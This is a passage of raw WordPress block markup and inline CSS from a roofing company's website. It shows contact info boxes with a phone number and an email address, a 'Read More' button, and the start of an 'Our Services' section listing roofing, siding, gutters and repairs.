style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"2019a28c-9fe4-4261-8545-472fe8f25e18\"} -->\n<style type=\"text/css\"> .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2019a28c-9fe4-4261-8545-472fe8f25e18\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"eb27f5f4-746e-46f7-8c6c-1546ed348b06\"} -->\n<style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"781513a3-174d-4594-86c8-5daf7f32af16\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-781513a3-174d-4594-86c8-5daf7f32af16 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"fead57cb-9c5c-411a-bb72-20bd150b5268\"} -->\n<style type=\"text/css\"> .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-fead57cb-9c5c-411a-bb72-20bd150b5268 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"57952f87-1484-4ebd-851f-822a3d450cc3\"} -->\n<style type=\"text/css\"> .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-57952f87-1484-4ebd-851f-822a3d450cc3\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"b7d6108a-a14d-4498-85a9-8c42833b5557\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-b7d6108a-a14d-4498-85a9-8c42833b5557\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"63ddace3-1c17-4204-b706-d0b433daef69\"} -->\n<style type=\"text/css\"> .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-63ddace3-1c17-4204-b706-d0b433daef69\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" 